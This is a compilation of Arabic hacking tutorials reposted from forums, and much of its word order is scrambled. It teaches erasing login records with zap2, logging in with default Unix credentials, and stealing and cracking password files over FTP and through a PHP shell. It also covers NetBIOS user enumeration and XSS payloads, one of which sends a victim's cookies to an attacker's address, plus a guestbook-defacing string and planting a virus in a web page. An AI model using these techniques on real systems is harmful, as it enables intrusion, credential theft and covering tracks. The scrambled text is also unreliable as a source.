/usr/adm/lastlog /var/adm/lastlog /var/log/lastlog

باستخدام مسحهم موقع lled يمكنك اي في تالقيها ممكن دي و.. مهتم

االستخدام تعرفطريقه لكي اقراه للمساعده ملف معاه  ... بيكوناستخدام حاله ايضا ftp في معلومات ذلك يتخلفعن االدوات لرفع

ازالتها يمكنكالسابقه wted باستخدام باالده شبيه هو lled و

االمر طبقنا لو ؟؟ who ماذا الرووت معانا لقينا و

sh-2.03$ whoroot tty1 Sep 25 18:18 

نستخدم دي الحاله في zap2 ممكناسمك : luser لو

sh-2.03$ ./zap2 luserZap2!

sh-2.03$ whosh-2.03$

اخيره : كلمهمن يمكنهم للمبتدئين بسيطه نبذه عن عباره هو الموضوع هذا

الله باذن موفقه بدايه .. البدايهرضاكم على يحوز ان .اتمنى

،،،انتهى

لينكس " طريق عن المواقع اختراق في " درساخر

> فلسطسن هاكر منتدى من >منقول> رعد: أبو > الكاتب

لينكس ...اختراق

أي به يقوم أحمق أو غبي تصرف أي عن مسؤوال لست كالعادة أنا والشخصية المعرفة زيادة و للعرض المعلومات هذه شخصو

بعملية للقيام األساسية الخطوات بشرح أقوم القسم هذا فيشروح أو معلومات أية لديك كان فإذا الشبكة على تخريب و اختراق

لنا بإرسالها القيام الرجاء القسم هذا في نشرها  تود

الـــهـــكـــرالتعقيدات في الخول قبل بسيطة خلفية إلى حاجة في هنا  نحن

على صالحيات على الحصول يعني تخريب أو اختراق قول إنالعادية األحوال في عليها بالحصول لنا يسمح ال الشبكات سيرفرات

منهم فرد لكل الناسو من العديد الستقبال معدة الشبكات فخوادمالفريسرفرز على حساب لراشد أن فالنفترض الشبكة على  حساب

FreeServers.com االنترنت على خدمات  مزود

بإعطائه سيقوم  : الذي

الشبكة على راشد لمجلد التعريف هو و مستخدم  اسم

قسمه و مجلده إلى للدخول مفتاحه هي و مرور  كلمة

لراشد المتاحة الخدمات جميع إلى للوصول السبيل هما هذان  و

واألصل اللب إلى الوصول على نركز سوف  و

في تتمثل األولى نظام إلى للدخول رئيستان طريقتان هناكو بطيئة هي و مستخدم اسم و سر كلمة من خليط على الحصولو الخادم ضعف مناطق استغالل فهي الثانية الطريقة وأما نادرة

خاللها من  التسلل

محولتك إكتشاف إن مطاردتك السهل من إلنه و ممنوع التخريب إنو الشبكة على تعريفك رقم أدرسفهو بي األي طريق عن لإلختراق

شبكتك خدمات لمزود خاطئة بينات بإعطاء تقوم أن هو  الحل

المستخم اسم و السري الرقم لسرقة أدوات المخترقون يستخدمالبرامج أحد هذا و االنترنت مقاهي مثل العامة األماكن  من

همية و ببيانات التسجيل أو األسهل هو هذا و البروكسي بتغيير قمخدمة بتعطيل قم و بخصوصية التصفح لك يضمن Caller ID لموقع

تعمل كانت  إذا

المعلومات ... جمع هكر عملية ألي األولى الخطوة نأخذ اآلن  نحن

بتشغيل قم اآلن جاهز أنك من notepade البد جديد متصفح ونافذةمثل آخر موقع أي أو بي أي محطم  خالل

Hakkerz.home.ml.org بنسخ قم و موجود إيميل أي تسجيل و الموقع بفحص ألي html قم

مهمة  صفحة

مثال موجود غير إيميل أقصد لهم همي و بإرسال  قم

Blahblahblah@ الموقع  اسم

امكانياته جميع واستخدام مجاني بريد موقع من بإرساله ينصح ومعه و إليه المرسل البريد جود عدم بسبب إيميل سيأتيك المهم

في الموجوده المعلومات  الرسالة header بعض

عن المعلومات بعض لمعرفة تعقب أدوات إلى حاجة في اآلن أنتالضحية للخادم  المزود

بي األي إلى ستحتاج التعريف IP أوال خدمة ثانيا لتحصل Whois وعنه معلومات  عن

و عليه السيرفر نوع و الموقع مالكي عن معلومات سيعطيك الذيبتسجيلها  قم

خاصية باستخدام عليك أوال finger اآلن  جرب

الموقع  @Finger اسم

ايميل جرب مفيدة تكون قد التي معلومات بإعطائك يقم لم إذا واألعلى في عليها حصلنا التي  من

المنافذ بفحص القيام عليك بي scan ports اآلن حصلنا IP لألي الذيو الموقع يدعمها التي الخدمات و المفتوحة المنافذ تعرف لكي عليه

ألنظمة معظمها و لذلك جيدة برامج  Linux /Unix systems هناك

البرنامج هذا على Exploit Generator و ويندوز بأنظمة خاص الشبكات

تفحص ننسى فدعنا الحراسة شديد موقع ستخترق كنت إن وإذا إال عنه الكشف يتم قد و شرعي غير العمل هذا ألن لمدة المنافذ

نظام تمتلك كنت المنفذ linux ما كان إذا أنه ذلك من يهمنا 21ما يدعمون أنهم ذلك فيعني كان FTP مفتوحا إن أنهم 23و فذلك

 TelNet يملكون

Telnet وضع في أنت و السيرفر نوع معرفة هو ذلك الهدفمنAnonymous األمور تلك بكل للقيام العموم على و متصفحك في

تتعبفي ال حتى التالي الموقع في تحتاجه ما ستجد الذكر سالفةنافذة hakkerz.home.ml.org البحث بفتح قم حديثنا فلنتابع المهمtelnet إلى المنفذ غير ب 23و يبدأ الموقع كان إذا و www فجرب

إضافة فجرب بينات بإعطائك يقم لم فإن بدونها ذلكtelnet.Victim.com كلمة telnet مكان ترى ينجح www كما لم إذا ومن عليها حصلنا التي السرفرات مواقع من أي بمجرد whois جرب و

نوع بالتحديد و تحتاجها بيانات أية بتسجيل قم الدخول في نجاحك السيرفر

إلى المنفذ بتغيير قم ال 21اآلن منفذ إلى سيأخذك اآلن و ftp فإن كتابة جرب ذلك  حصل

SYST المنفذ جرب محظوظا كنت إذا اآلن السيرفر نوع 80لتعرف ال منفذ يعد نوع http الذي اإلطالق على أهمها و بينات أي وسجل

يدعى برنامج جرب كله ذلك بعد تنجح لم فإذا Whats السيرفرRunning? ذلك سيسجل الضحية سيرفر لكن و يعمل قد  و

ايجاد أو البرامج استخدام طريقتان هناك البداية في ذكرت كما وباستخدام عليه ستحصل الذي الباسوورد اآلن لنجرب و  الباسوورد

$Login: root$Password: root 

برامج أن حيث أوال هذا بتجربة من linux فلنقم بعدد محملة تأتيالقيام عليك لذلك هي كما تبقى غالبا هي و الجاهزة الباسوورد

باستخدام ال telnet باتصال و الذكر سالف الموقع من هو الذي وبتجربة وقم جهازك على الموجود العادي البرنامج تستخدم

التالية المستخدمين اسماء و  الباسوورد

ACCOUNT: PASSWORD)login( root: )password( root

sys: sys / system / binbin: sys / bin

mountfsys: mountfsysadm: adm

uucp: uucpnuucp: anonanon: anonuser: user

games: gamesinstall: installdemo: demo

umountfsys: umountfsyssync: sync

admin: adminguest: guest

daemon: daemon 

يستخدمون الذين الناساألغبياء من العديد هناك فإن تصلح لم إذا والبريد من األول الشق بتجربة قم كباسوورد الدخول أسماء

التي البيانات من أو كباسوورد كذلك و مستخدم كإسم االلكترونيمن عليها بالتجربة whois حصلت قم اآلن إلى تعيسالحظ كنت أن و

نظام إلى الدخول تحاول أنك افتراض على لربما unix التالية فإنكملف هناك أن الجواب و الباسوورد إلى النظام يتعرف كيف تتساءل

الطرق passwd يدعى إحدى و إليه للوصول المحاولة علينا لذلكال استخدام هي نافذة ftp القديمة باستخدام إليه سندخل الذي و

نظري في و لكن internet explorer المتصفح و الحالة هذه في ينفعباستخدام سابقا النافذة فتحنا كما و لهم معرف غير تكون أن عليك

IP jammer موقع في الكرة .hakkerz.home.ml.org الموجود سنعيدقم و بي األي اخفاء على يعتمد القادم و السابق عملنا إن بل ثانية

مثال التالي الشكل طريق عن  بالتجربة

ftp:// abc.net أو ftp://ftp.abc.net/  بتجربة قم منها أي يعمل لم إن ومواقع من ftp أي المعطاة البيانات في موجودة whois كانت

مجلد على اضغط الدخول في نجحت أنك ستر etc\ فالنفترض األن وعلى passwd ملف كان إن و بفتحه وقم جهازك على بتنزيله قم

محظوظ فأنت التالي  الشكل

root:2fkbNba29uWys:0:1:Operator:/:/bin/cshadmin:rYsKMjnvRppro:100:11:WWW

administrator:/home/Common/WWW:/bin/cshkangaroo:3A62i9qr:1012:10:Hisaharu

[etc.] 

هو و المستخدم اسم ترى هنا الباسوورد kangaroo و تشفير وهو 3وليسهي a62i9qr بالتالي أشبه فوق المنظر سيكون  أو

root:*:0:1:Operator:/:/bin/cshadmin:*:100:11:WWW

administrator:/home/Common/WWW:/bin/cshkangaroo:*:1012:10:Hisaharu 

TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh 

بباسوورد استعيضعنها المشفرة الباسوورد فإن تشاهد كما هنا وهو و تشفيرها فك  يصعب

*’s أو x’s? برامج هناك فإن األعلى في النوع على حصلت إن ومثل تشريرها فك ليونكسو الباسوورد لملفات John the مخصصة

Ripper 1.5 كثيرة كلمات ملفات إلى يحتاج الذي .و

،،،انتهى

الـ ".26 ( PHP Shellدرسعن األول " )الجزء

> موقع من > pharaonicsمنقول< Arab VieruZ:الكاتب<

و المستخدمة والخداع الطرق يشرح شل اتشبي للبي موضوعلينكس اوامر

عليكم ...السالموحله سيرفر على موقع صاحب كل يرعب ملف شيل اتشبي البي

يمكن مما اسهل

فسمحولي قليال سأطوله لكن جدا بسيط  الموضوع

 : اوال

التالية الوصلة  راجع

: ثانيا

الـ هو ما معرفة منك اتوقع كامال الموضوع قراءتك وبعد PHP اآلنShell

*-----------------------------------------------*

األول : الجزء

لينكس اوامر

*-----------------------------------------------*

الملفات سرد ls -a : امر

غيرها او المخفية الملفات جميع سرد

*-----------------------------------------------*

الملف عرضمحتويات cat او cat -e : امر

الملفوعرضمحتوياته فتح

*-----------------------------------------------*

الملف حذف rm -f : امر

تريد الذي الملف لحذف

*-----------------------------------------------*

المجلد حذف rm -d : امر

تريد الذي المجلد لحذف

*-----------------------------------------------*

النسخ cp -i : امر

تريد الذي الملف لنسخ

*-----------------------------------------------*

التسمية اعادة mv : امر

التسمية ألعادة

*-----------------------------------------------*

الكتب : بشراء لينكسقم اوامر من المزيد لمعرف مالحظةعلى  وللحصول

ثم األمر بوضع كم األوامر من ألمر اكثر help-- معلومات

ls --help : مثال

*-----------------------------------------------*

*-----------------------------------------------**-----------------------------------------------*

الثاني : الجزء

األوامر تنفيذ : كيفية

*-----------------------------------------------*

تنفيذه -1 المراد األمر بكتابة قم للكتابة مربع ستجد

والمجلدات -2 الملفات تعرض هنا

فقط -3 المجلدات تعرض هنا

اآلن -4 عليه تعمل الذي الفلودر  مكان

خطأ -5 وجود عند يحدث ما ليخبرك العالمة  ضع*-----------------------------------------------**-----------------------------------------------*

الثالث : الجزء

الملف هذا لتحميل والطرق : الخدع

*-----------------------------------------------*

المشكله تأتي !!! هنا

انا اتبعها التي وسنستعرضبعضالطرق مستحيله ليست لكن شخصيا

الملف -1 تحميل منها تستطيع ثغرة ايجاد

الـ : حقت القديمة النوك ثغرة hacked.txt مثال

*-----------------------------------------------*

ذكي -2 الموقع صاحب وكان معين موقع اختراق نريد اننا لنفرضوحريص جدا

البحث نحاول و المستضيفة الشركة تحديد اوال تنفع قد طريقه هذيمواقع عن

يكون األستضافة نفسشركة في األقل على او نفسالسيرفر فيدلخ  صاحبها

الملف منها نحمل ثغرة نلقى ونحاول

*-----------------------------------------------*

اتشبي -3 البي تدعم التي المجانية .المواقع

،،،انتهى

الـ " ( PHP Shellدرسعن الثاني " )الجزء

> موقع من > pharaonicsمنقول< Arab VieruZ:الكاتب<

مباشره الموضوع نتابع

*-----------------------------------------------**-----------------------------------------------*

الرابع : الجزء

الباسورد على الحصول :طرق

*-----------------------------------------------*

الـ موضوع سيأخذ الجزء PHP Shell 2 هذا

تواجه قد التي الطرق اصعب من هي الباسورد على الحصول طرق . المخترق

*-----------------------------------------------*

الـ -1 اكسس ملفات الباسمن بالعادة My SQL اخذ تسمى التيconfig.php

الـ في التالي األمر تنفيذ طريق الباسعن اخذ PHP Shell ويمكن

التالي األمر وكتابة الملف هذا فيه يوجد الذي المجلد الى الذهاب

cat config.php

المتغيرات احد في الباسورد وسيظهر

*-----------------------------------------------*

الـ -2 ملف من الباسالمشفر htpasswed. اخذ

قم تجده لم واذا السيرفر مجلدات احد في الملف هذا اجاد ويمكن بفتح

السابق htaccess. الـ الملف مكان تجد حتى

/home/site/.htpasswds/forum/admin/passwd : مثال

cat /home/site/.htpasswds/forum/admin/passwd : األمر

بتشفير الباسالمشفر رايبر DES ستجد ذا بجون تفكه تقدر يعني

user:nymw4oS3oerdY*-----------------------------------------------*

او -3 سيرفر األكستينشون : service.pwd طريقة

بيج بالفرونت الخاص الباسورد به ويوجد بيج للفرونت تابع وهوDES مشفر

مجلد داخل : ويوجد

_vti_pvt

cat /home/site/www/_vti_pvt/service.pwd : األمر

درس : راجع القسم DeXXa رابط بهذا الخاص

user:nymw4oS3oerdY

*-----------------------------------------------*

وهي -4 اال كمالحظة الكن كقسم اعتبارها يمكن : ال

الـ مثل سكربتات في تتحد المواقع بعض phpMyAdmin ان

السكربت هذا لدخول اكسسخاص موقع لكن ويكون

الـ بملف للقاعدة config.php ويكون الروت  يكون

كان موقع ألي قاعدة اي وتمسح تعدل يمكن !! يعني

،،،انتهى

الـ " ( PHP Shellدرسعن الثالث " )الجزء

> موقع من > pharaonicsمنقول< Arab VieruZ:الكاتب<

الدرس هذا من األخير الخامسو الجزء

سأذكر مشاكل وجود من البد لكن األشياء معظم عرفت اآلن انك بمااصابني الذي

*-----------------------------------*

االخرى -1 المواقع عرض : مشكلة

في السيرفر في الموجودة المواقع : جميع

/home

الروت : مجلد الى بالذهاب قم / األمر

ls -a /home

لعرضه ما موقع ملفات يحوي مجلد كل مجلدات ستجد

ls -a /home/SITE

SITE = المجلد او الموقع اسم

*-----------------------------------*

الموقع -2 عرضملفات : مشكلة

بدخول تسمح ال السيرفرات انت home بعض كنت اذا اال الموقعالموقع صاحب او روت

: الحل

بدخول  : قم

home/site/public_html/

 او

home/site/www/

تعرض التي الموقع ملفات الى  لدخول

*-----------------------------------*

تعمل -3 ال  بعضاألوامر

بكرنل خاص دور باك استعمال ويجب حلها الصعب من مشكله هذهالسيرفر

الكرنل اصدار .اقصد

،،،انتهى

أداة " " anmap شرح

>منقول<> : الخجول الهكر بواسطة >مترجم

 : اإلسمnmap - أمني ماسح و الشبكات كشفعن  أداة

 : الخالصةالخيارات - المسح  أنواع

 : الوصف

بمسح األفراد و النظام لمدراء يسمح لكي البرنامج هذا صممكبيرة  شبكات

وتدعم . خدمات من يقدمون وماذا المضيفين معرفة و لتقرير اإلنماب

مثل المسح تقنيات من كبير  : عدد

UDPTCP connect)(

TCP SYN )half open(ftp proxy )bounceattack(

Reverse-identICMP )ping sweep(

FINACK sweepXmas TreeSYN sweep

and Null scan. 

مثل .. المتقدمة المميزات من عدد أيضا تقدم :اإلنماب

remote OS detection via TCP/IP fingerprintingstealth scanning

dynamic delay and retransmission calculationsparallel scanning

detection of down hosts via parallel pingsdecoy scanning port

filtering detectiondirect )non-portmapper( RPC scanning

fragmentation scanningflexible target and port specification

التي المهمه بالبورتات قائمة هيئة على ماتكون عادةا اإلنماب نتائج توجد

يعطينا . دائما واإلنماب المسح عملية عليها أجريت التي اآللة فيوالبروتوكول والحالة والعدد الخدمة وإسم البورتات

مرشحة غير أو مرشحة او مفتوحة تكون أن إما الحاله

البورت بهذا إتصال أي تقبل سوف اآللة أن تعني مفتوحة

) أخرى ) عقبة أي أو مرشح فلتر أو فايروول هناك أن تعني المرشحةمن اإلنماب وتمنع البورت هذا  تغطي

ال أو مفتوحا كان إذا البورت حالة معرفة

مغلق بأنه اإلنماب لدى معروف البورت هذا بأن تعني مرشح  غير ) اإلنماب ) محاولة في تدخل مرشح فلتر أو فايروول أي أن يبدو وال

إال معرفتهم يمكن وال الحاالت أغلب هي المرشحة غير والبورتاتالبورتات معظم يكون أن هي ، واحدة حالة في

ترشيح حالة في المسح عملة لهم أجريت التي

يبلغ أن فيمكن اإلنماب في المستخدمه الخيارات على وباإلعتمادهوست الريموت في التالية المميزة الحاالت  : عن

المستخدم النظام

TCP sequencability

بورت بكل المرتبطة البرامج يشغلون الذين المستخدمين  أسماء

إس إن الدي  أسماءاألخرى .وبعضاألشياء

،،،انتهى

ثغرات " بدون السيرفرات إلقتحام " طريقة

> اإلسالمية الحزم شبكة منتديات من >منقول>network access :الكاتب<

بصراحه علم وال فن اي فيه ماشوف بصراحه انا الثغرات استخدامتسوي ماتحسانك يعني نظري وجه وهذي جاهز شي تستخدم انت

ووقت جهد منك ياخذ متعب  شيله واحد كل ويمكن الثغرات استخدام غير جدا كثيره طرق في لكن

انسان انك بما لكن الثغرات استغالل في حتى واسلوبه طريقتهاقتحام مسئله اعتقد متمكن نفسك وتشوف هاكر انك يفترض

الواحد ممكن يعني وزمان بوقت تربطها ماراح موقع او سيرفريقدر الين يفشل مره وكل ثالثه شهرين شهر لمده يجلسيحاول

هذا الموضوع كتبت انا االساسهذا وعلى لنتيجه االخير في يوصلفيه الله وينفعنا مفيد يكون انه اتمنى انشالله  الي

( بمواضيع ازعجتكم احساني المشاركه عن نتكلم ماراح

 المشاركه (بنسبه ولو الدخول من تمكنك معروفه طرق اغلب% 50فيه على

الحظ بالعالم الموجوده 50السيرفرات % 

عامه معلومات تكوين الغرضمنها دائمايكون االولى الجهمات اوالاي وعلى الهجوم نبدا هنا ومن مهاجمتته يراد الذي السيرفر عن

الهجوم يتركز  اساس

حسب كامل اقتحام هجوم واحيانا خدمه حرمان هجوم يكون احيانالدينا الموجوده والمعلومات والمتوفر  الموجود

باسم معينه شركه نخشعلى ودنا اننا لنفرض aswind.COM طيبعنوان مدى على التعرف هي األولى بهذه ip الخطوه الخاصه

سهل وهذا  الشركهموقع في بالتسجيل انصح شي  INTERNIC.NET اول

تستاهل خدمات يعطونك  حتىاوال بي االي لمعرفه طريقتين  هناك

الموقع طريق INTERNIC.NET عنالدوسباالمر برنامج طريق عن  : والثانيه

NSLOOKUPSET TYPE = ALL

aswind.COMبالضبط هذي المعلومات تطلعلك : راح

Domain Name: ASWIND.COMRegistrar: ONLINENIC, INC.

Whois Server: whois.OnlineNIC.comReferral URL: http://www.onlinenic.com/

Name Server: DNS.ASWIND.COMName Server: NS1.ASWIND.COM

Updated Date: 01-apr-2002

شركه ان هذا الكالم الملقامات aswind.com معنا ارقام وضعتب DNS = 2الخاصه

عدد خادم 2يعني DNS االقل على هناك يعني نشر لها وسوتبخدمه شغالين الموضوع DNS سيرفرين ان يتعتقدون هم يعني

خاصه لألجهزه التشغيل طاقه من كثير ياخذ  DNS ماراح

بيانات وتعديل للدخول مجال في تصير DNS هنا العمليه ان بمعنىشوي  واسعه

عنواوين من عنوانين بنشر قم ماسوو Ip فقط مثل فقطaswind.com لنفول عنوان من اكثر فيه انه لنفترض مثال 6لكن .

عنواونين وضع الشركات على اقترح كذا ووضع IP عشان للنشرل DNS خوادم حاجه في اساسا ألنك وبطيئه قديمه اجهزه DNSعلى

بتشغيل تقوم انك يعني وهذا على DNS وخدمه WIN2K دايناميكيجهاز وضعت اذا نظري في الجيده االفكار من وهذي واحد جهاز

بال  DNS خاصفقط

اجهزه على مالقيتشي انك لنفرض بدايه DNS طيب في انك وبما

جميع بتجريب قم اذن الوقت من متسع عندك انه يعني هذا هجوممن عليها حصلت والتي لديك المتوفره وصدقوني HowIS العناوين

مجموعه تمسح انها مممكن بالنت موجوده ادوات موجوده IP فيهمعينه شبكه  في

اسمه ملف بعمل قم اسم LMHOSTS طيب فيه لكل NetBios يوجودعليه IP عنوان تحصل انك  استطعت

كالس من الشبكه ان عرفت انت سو 200.200.200.0وعنوانها C يعني ملف باسم NetBios باسم LMHOSTS لك N2 = 200.200.200.2 وملفعمل تحتاج بعدين من Net view //servername وهكذا اسم N1 لكلثانيه N254 إلى بسبطريقه بورت سكان تسوي كانك يعني

رقم جهاز رقم 1من جهاز 254إلىالعناوين ام فيها الخدمه تشتغل سوف الصحيحه لألجهزه وبالنسبه

طبعا تستجيب فلن متصله الغير

تسويشي ماتقدر االن اال انت \ طيبحساب من تتاكد تغييره Administrator بستقدر تم او ال واال موجود

ماتقدر الحال بطبيعه انت بنفسالصالحيات نيم يوزر هناك اذا اوبسهوله عليه  تحصل

الوصول الطرق بعض من عليه للحصول خلفيه ابواب هناك اذنعيب يعتبر وهذا الشركه في الموجودين المستخدمين لبعضاسماء

عيون ليش Windwos من مدري ههههههههه تطنشهم  النهاالنه تسويه ماتقدر انت االن بسأال خالله تعرفمن تقدر امر فيهعلى تحصل الزم انت يعني مباشر وصول حق username and مالك

password هو االمر المجال في موجود يوزر وهو net user اليبالمجال الموجودين المستخدمين جميع يستعرضلكههههههه بالهبل اسماء على للحصول طريقه فيه  لكن

؟؟ كيفليسفقط جهازه يقوم دخول بتسجيل مستخدم يقوم عندما االن

مدير المثال سبيل على يعني جهازه اسم بل فقط اسمه بتسجيلحتى النظام مراقبه اسمها خدمه يشغل زحمه عنده صار اذا الشبكه

األقصى للحد وصل انه  يعرفخدمه تقوم الدخول بتسجيل مستخدم يقوم Messenger عندما

Service اسماء كاحد المستخدم اسم الموجودين NetBios بتسجيلافتراضانك وعلى عنهم جالستبحث اساسا انت الي الشبكه في

بعنوان خادم على قام IP 200.200.200.200 دخلت اذا شخص اي فأنجهازك nbtstat -a 200.200.200.200 بعمل اسم معرفه من سيتكمن

جهازك كان واذا المستخدم سوف ) MSBROWSER واسم ال اوبالتفصيل ( عنها  اتحدث

شخصباسم فيه لنفرضان IP 200.200.200.50 ورقم John طيببعمل قمت اذا فانك الشبكه في Nbtstat -a 200.200.200.50 موجود

شخصباسم فيه انه يضهرلك جهازه john راح  johnPC واسممستخدم اسم معك موجود يكون ( األن طيب) Administrator احتمال

 وشنسوي ؟

خدمه بتعطيل تسجيل ) Messenger Service قوم يتم ولن جهزك فيبتخشمخفي ( يعني النطاق في  اسمك

ل االمر MSBROWSER وبالسنبه عمل بعد شفتها  nbtstat -a اذاالتي االخطاء اكبر من وهذا للمجال استعراضرئيسي انه يعني هذا

يستطيع ال يدوخ المجال مراقب الن الشبكات مدراء بها يقومونالشبكات في دائما الثغرات هذه مثل استغالل وتستطيع التجميع

 الداخليهالمتسخدم اسم على حصلت االن انت  طيب

انتضميت يعني المشكله هي وهذي المرور كلمه محتاج انتتقدر لكن المرور كلمه على تحصل ماقدرت لكن الشبكه مع جهازكعليها متاكد ) nt senstiver تحصل معليشماني متحسسالشبكه او

السبيلنق (  . منالمرور كلمه على فعليا احصل اقدر كيف  طيب

وجدت اذا هاذ جدا تاففه المستخدمين مرور كلمات ماتكون غالبا اصال

مثل برنامج المشكله l0pthcrack يعني لك .يحل

،،،انتهى

" Cross Site Scripting "

> الحلم منتدى من >منقول>tcp :الكاتب<

: المتطلبات

بلغة تامه HTML معرفة

وهي السكربتينق لغات على متعمق غير اطالعJAVASCRIPT ,PERL ,CGI ,VBSCRIPT

والهتمل سكربت الجافا من كلها المصايب شخصية نظر وجهة ومن

================================================== =============================================

المنشوده : االهداف

من * هامه معلومات سرقة فيها يتم التى الكيفية عن القارئ افهامالمستخدم جهاز

نوع * من المنتديات او YaBB and UBB او VBULLETIN اختراقنيوك بوست او نيوك البهب من المجالت

* اختطاف او الكوكيز سرقة فيها تتم التي الكيفية عن القراء افهامالمستخدمين من الجلسة

االختراق * مداخل توسيع القارئ يستطيع ان

================================================== ==============================================

عرضية : جمله

من وارجو فائده لها الشياء واستغالل للمخ تشغيل ليساال االختراقالتعود يحاول بان الموضوع هذا يقرا

عنه ويترك التطوير الى يلجأ ثم والترجمه القراءة مسألة علىاو لمنتدى منتدى من المطامر مسألة

تطور ... امة الى نحتاج هل االمنية الثغرات تطرح التي المواقعاالمية .. نحو انفسنا نطور ام نفسها

================================================== ==============================================

: المشكلة

نت او االكسبلورر مثل الوب مستعرضات فان معروف هو كماالسكربتات ... او النصوص مترجمات تاتي الخ سكيب

اننا فلو المستخدم جهاز على السكربتات ترجمة ويتم داخلها مبنيةمعين سكربت بها كان صفحة طلبنا

نفسالصفحه على ويظهره السكربت هذا يترجم المستعرض فان. المطلوبه

هذه ترفضمثل النقاشفانها مجموعات او للمنديات بالنسبة اماللخصوصية خرق وتعتبرها السكربتات

من حساسة معلومات لسرقة اغراضسيئة في تستغل قد اوالمستخدمين

السكربت ادراج كيفية يوضح التالي : المثال

Hello FOLKS board. This is a message.

>SCRIPT<malicious code>/SCRIPT<

This is the end of my message.

كلمة عالمتي malicious code ان بين في حقنها او ادرجها تمخبيث كود على تحتوي وقد السكربت

المنتديات ... برامج مصمموا فان لذلك الخ بيانات يرسل او يسرقاالدمن مكنها اذا اال يمنعونها ومطوروا

تفيل المنتدى مكن اذا استخدامها يتم قد او المصمم مثال HTML اواالمج خاصية مكان السكربت ادراج يتم

>script<document.write)'>img src="http://my_ip_address/'+document.******+'"<';>/script<

او صفحة في رابط شكل على يكتب ان السكربت يستطيع قد اوالمسنجر طريق عن لك يرسل او بالبريد لك يرسل

فيصفحة رابط عمل كيفية لك يوضح التالي والمثال

>A HREF="http://example.com/comment.cgi? mycomment=>SCRIPT<malicious code>/SCRIPT<"< Click

here>/A<

باحد يصلك عندما فقط انها الكود عمل كيفية في وركز هنا انظرالسكربت سينفذ عليه وتضغط اعاله المذكوره الطرق

السكربت ان لنفرض اكثر يرسل comment.cgi وللشرح سكربتللبحث سكربت يكون قد او الموقع لصاحب مالحظاتك

اسمه داخله متغير على يحتوي وهو المنتدى او الموقع فيmycomment تكتبها التي المالحظات او المدخالت ياخذ

من ناتجه ديناميكية صفحات ويولد بحث سكربت انه اعتبرناه فلوان فبدل وخيمة النتائج ستكون البحث

منه السكربت مايطلبه سينتج النشطه او الحيوية الصفحات ينتجداخل السكربت ضمن فقد هنا الفكره الحظ

ليأخذ نصوصاستخدم النصي الحقل ياخذ ان من فبدال نصي حقلالسكربت من . اوامر

التالي المثال الحظ اكثر االمور اعقد : وحتى

>A HREF="http://example.com/comment.cgi? mycomment=>SCRIPT SRC='http://bad-site/badfile'<>/SCRIPT<"<

Click here>/A<

اكثر طوره المره هذه لكن السابق نفسالسكربت استخدم هناوالذي اخر موقع ملفمن ادراج في مستخدما ليكون

باالسم مصادر BADFILE هو عدة فيه ادخل البيانات مصدر والنالهجوم هذا فأن المذكور السكربت طريق عن اخرى

عبور " cross-site scripting يسمىب برمجة عندي من الترجمه اوبرمجة " باستخدام عبرنا الننا الموقع

فوكس السيكيورتي في تالحظ كنت واذا موقع من اكثر السكربتاتب تختصر االمنيه المواقع اختصار CSS او وهي

اوراق CASCADE style sheets وليسل cross-site scripting ل ايالمتتالية االنماط

التالية الوسوم من اي السكربت عالمة او الوسم بدل يدخل قد

>SCRIPT<, >OBJECT<, >APPLET<, and >EMBED<

النماذج وسم هناك يكون ان الممكن وسوم >form< ومن HTML مناالوامر تنفيذ يمكن السابقة وبنفساالفكار

اخرى لصفحات توجيهك او اخرى بيانات او الكوكيز لسرقة منها

واليونيكود عشر السداسي التكويد عن ماكتبته قرات كنت اذااقصده ما تفهم ان االن تستطيع

================================================== =======

التفاصيل من : ولمزيد

http://www.cert.org/advisories/CA-2000-02.html

http://www.perl.com/pub/a/2002/02/20/css.html

،،،انتهى

الزوار " سجل تدمير " كود

> المهندس منتديات من >منقول> العبقري: >الكاتب

, الزوار سجل تدمير على بقدرته كبير بحجمه جدا صغير كودفيسجل... توقيع عمل كيفية طبعا تعرفون انتم بالكامل

- - - - طريقة, للموقع تقديرك الشخصي موقعك األيميل األسم الزوارعلى...... تعليقك كتابة وهي المهمه والنقطه األستدالل

 الموقع؟؟؟؟؟؟؟

نأتي عندما ولكن مطلوب هو ما شيحسب كل نضع سوف نحن ........... ونكتب نقف التعليق  :لكتابة

. 

. 

. 

. 

. 

. 

. 

. 

. 

. 

. 

. 

.

الكود هو  : هذا==================================================

= h3<put your text here>xmp<>plaintext<>--

==================================================

مكان في تريد شي اي كتابة .... put your text here يمكنك كل وهذاحصل .... ماذا ريفريشوانظر اعمل توقيعك بعد  شي

 :مالحظه===== 

الزوار؟ سجل انواع بعض مع يعمل ال  !الكود

،،،انتهى

صفحة " فايروسفي " وضع

> إعصار منتدى من >منقول>Dr^FunnY :الكاتب<

عادي ... االول مربعات ثالث تحت هاتالقي جديدة صفحة اختارمعاينة html والثاني  والثالث

العادي في خليك  انتادراج اختار

... ..... خليك خانتين من صغير جدول هايطلعلك ويب مكون اختار ثمهو اللي اختيار ااخر منها واختار اليمين على اللي االولى الخانة في " في" عناصر وهايظهرلك واحده اضغطضغطه متقدمة تحكم عناصر

هو اللي اختيار اول اختار اليسار على اللي ... "HTML" الخانه ... الفيرس كود ده المربع في تحط عليك انت تاني مربع هايفتحلك

موافق استوت   وتضغط الطبخة وكده . لو لكن معندكشنورتن وانت الصفة معاينة على تضغط واوعى

فيروس بوجود تحذير هايديك  عندكنفس هي انجليزي عنده واللي عربي بيج فرونت عنده للي الطريقه

االسامي تغيير مع .الخطوات

،،،انتهى

" الثغرااات

> الجهاد موقع من >منقول

Exploit = = ثغرة اسثمارالمهم :الجزء

استغاللها ويمكنك التشغيل نظام في برمجية أخطاء هي الثغرات.. إلخ وووو البيانات وقاعدة الباسوورد ملف على للحصول

الموقع حول الممكنة المعلومات كل تجمع أن يجب : أوالطريق -1 عن وهذ مثال والتلنت بي تي اإلف مثل المفتوحة المنافذ

مثل برامجsuper scan 

االنترنت في عنه .ابحثوالفائدة -2 لينوكسوغيرها أم ويندوز الموقع تشغيل نظام معرفة

ملف به الذي المجلد واسم به الخاصة ثغراته له نظام كل أن ذلك منآلخر تشغيل نظام يختلفمن .الباسوورد

الموقع إلى إذهب التشغيل نظام لمعرفةwww.netcraft.net

!.!!.. الموقع عن المعلومات بعض وستعرف إنتر ثم الموقع واكتب... إلخ التشغيل ونظام كآليبي

ذلك -3 وغير كالبريد خدمات من الموقع مايقدمه كل معرفةالسي -4 وبرامج المنتديات مثل الموقع على المثبتة البرامج معرفة

آي جيالثغرات أنواع

المتصفح طريق عن إليها الوصول يمكن التي هي األنواع أبسطمثل

www.thesite.com/....../االستثمارات أو الباقية : واألنواع

